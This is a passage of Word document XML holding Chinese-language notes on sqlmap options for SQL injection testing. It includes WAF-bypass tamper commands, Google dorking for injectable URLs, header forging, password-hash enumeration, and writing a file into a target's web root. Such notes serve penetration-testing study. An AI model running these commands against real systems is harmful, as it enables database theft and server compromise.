          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  S  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>堆叠注入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  T </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时间盲注</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> -U </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>联合注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E8E309" w14:textId="77777777" w:rsidR="00B57872" w:rsidRDefault="00B57872" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C5AA2B0" w14:textId="77777777" w:rsidR="00B57872" w:rsidRDefault="00B57872" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结合</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>waf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>讲</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tamper</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2032A6" w14:textId="77777777" w:rsidR="00B57872" w:rsidRDefault="00B57872" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A43D5C2" w14:textId="77777777" w:rsidR="00B57872" w:rsidRDefault="00B57872" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>./sqlmap.py -u http://127.0.0.1/test.php?id=1 -v 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576C49F1" w14:textId="77777777" w:rsidR="00B57872" w:rsidRDefault="00B57872" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="705D93EA" w14:textId="77777777" w:rsidR="00B57872" w:rsidRDefault="00B57872" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51007164" w14:textId="77777777" w:rsidR="00B57872" w:rsidRDefault="00B57872" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>更新命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:python sqlmap.py --update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190AED0F" w14:textId="77777777" w:rsidR="00B57872" w:rsidRDefault="00B57872" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缓存，输出文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:C:\Users\asus\.sqlmap\output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53352939" w14:textId="77777777" w:rsidR="00B57872" w:rsidRDefault="00B57872" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="397B4234" w14:textId="77777777" w:rsidR="00B57872" w:rsidRDefault="00B57872" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A79E34" w14:textId="77777777" w:rsidR="00B57872" w:rsidRDefault="00B57872" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">-l : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>burp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">WebScarab </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代理中获取日志</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616D1E82" w14:textId="77777777" w:rsidR="00B57872" w:rsidRDefault="00B57872" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">-m </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：文件报错多行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> www.target.com/?q=foobar </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32385777" w14:textId="77777777" w:rsidR="00B57872" w:rsidRDefault="00B57872" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">-r : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加载文件进行注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36803BD6" w14:textId="77777777" w:rsidR="00B57872" w:rsidRDefault="00B57872" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-g : Google</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中搜索注入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:sqlmap -g "inurl:\".php?id=1\""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70843EC8" w14:textId="77777777" w:rsidR="00B57872" w:rsidRDefault="00B57872" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">--data: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>把数据以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>post</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方式提交，会检测</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>post</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> --u "URL" --data="id=1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6967C8" w14:textId="77777777" w:rsidR="00B57872" w:rsidRDefault="00B57872" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12BF3781" w14:textId="77777777" w:rsidR="00B57872" w:rsidRDefault="00B57872" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">--cookie : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>自动获取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Set-Cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并添加</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC10D27" w14:textId="77777777" w:rsidR="00B57872" w:rsidRDefault="00B57872" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>--drop-set-cookie:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>拒绝</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25228156" w14:textId="77777777" w:rsidR="00B57872" w:rsidRDefault="00B57872" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37C896DC" w14:textId="77777777" w:rsidR="00B57872" w:rsidRDefault="00B57872" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">-v 5 : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>显示的等级</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25504EDD" w14:textId="77777777" w:rsidR="00B57872" w:rsidRDefault="00B57872" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">--level </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或以上尝试进行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>及以上</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>UA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>refer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14EE3F11" w14:textId="77777777" w:rsidR="00B57872" w:rsidRDefault="00B57872" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>--risk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：风险测试，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，默认</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F62D4B" w14:textId="77777777" w:rsidR="00B57872" w:rsidRDefault="00B57872" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09345FFB" w14:textId="77777777" w:rsidR="00B57872" w:rsidRDefault="00B57872" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">--user-agent : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>UA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>头</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3952C978" w14:textId="77777777" w:rsidR="00B57872" w:rsidRDefault="00B57872" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">--random-agent: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>拿</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/txt/user-agents.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>随机</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>UA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>头</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3807DDA8" w14:textId="77777777" w:rsidR="00B57872" w:rsidRDefault="00B57872" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">--headers : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以增加额外的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>UA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>头</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CF4070" w14:textId="77777777" w:rsidR="00B57872" w:rsidRDefault="00B57872" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">--refer : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>伪造</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>refer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>头</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E7CA53" w14:textId="77777777" w:rsidR="00B57872" w:rsidRDefault="00B57872" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C49B07C" w14:textId="77777777" w:rsidR="00B57872" w:rsidRDefault="00B57872" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>--delay:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>两个请求包的时间距离，默认没有延迟</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12047930" w14:textId="77777777" w:rsidR="00B57872" w:rsidRDefault="00B57872" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">--timeout: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>多久判定超时，默认</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>30</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>秒</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A9EEBE" w14:textId="77777777" w:rsidR="00B57872" w:rsidRDefault="00B57872" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">--retires : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重连次数，默认</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2238D3BB" w14:textId="77777777" w:rsidR="00B57872" w:rsidRDefault="00B57872" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="791F6534" w14:textId="77777777" w:rsidR="00B57872" w:rsidRDefault="00B57872" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="447A658A" w14:textId="77777777" w:rsidR="00B57872" w:rsidRDefault="00B57872" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">--dbms: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指定数据库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26963D78" w14:textId="77777777" w:rsidR="00B57872" w:rsidRDefault="00B57872" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>--os:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>探测数据库服务系统</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC0F25E" w14:textId="77777777" w:rsidR="00B57872" w:rsidRDefault="00B57872" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="411EEED1" w14:textId="77777777" w:rsidR="00B57872" w:rsidRDefault="00B57872" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>--current-user:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>大多数数据库可以得到的管理用用户</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABCACB4" w14:textId="77777777" w:rsidR="00B57872" w:rsidRDefault="00B57872" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>--current-db:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当前数据库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133A5AFF" w14:textId="77777777" w:rsidR="00B57872" w:rsidRDefault="00B57872" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>--is-dba</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C1A7CD" w14:textId="77777777" w:rsidR="00B57872" w:rsidRDefault="00B57872" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>--users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604F4208" w14:textId="77777777" w:rsidR="00B57872" w:rsidRDefault="00B57872" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">--passwords : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当前用户有权读含用户密码的权限时，会列举用户并列出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，尝试破解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA50F96" w14:textId="77777777" w:rsidR="00B57872" w:rsidRDefault="00B57872" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6653CFCC" w14:textId="77777777" w:rsidR="00B57872" w:rsidRDefault="00B57872" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">--check-waf: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>waf,ids,ips</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>保护</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3857AAF0" w14:textId="77777777" w:rsidR="00B57872" w:rsidRDefault="00B57872" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">--identify-waf: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查找</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>waf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16458D43" w14:textId="77777777" w:rsidR="00B57872" w:rsidRDefault="00B57872" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0548EF2D" w14:textId="77777777" w:rsidR="00B57872" w:rsidRDefault="00B57872" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">--count -D testDB : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取数据库中不同表的数据个数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0C4ECA" w14:textId="77777777" w:rsidR="00B57872" w:rsidRDefault="00B57872" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">--start 1 --stop 3  : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取第几段的数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25377320" w14:textId="77777777" w:rsidR="00B57872" w:rsidRDefault="00B57872" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B486100" w14:textId="77777777" w:rsidR="00B57872" w:rsidRDefault="00B57872" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">--sql-query "select 'foo'" : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行自己的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BE16B1" w14:textId="77777777" w:rsidR="00B57872" w:rsidRDefault="00B57872" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51794809" w14:textId="77777777" w:rsidR="00B57872" w:rsidRDefault="00B57872" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>--file-write /test/test.txt --file-dest /var/www/html/1.txt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将本</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> test.txt </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件写入到目标的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1.txt</w:t>
      </w:r>
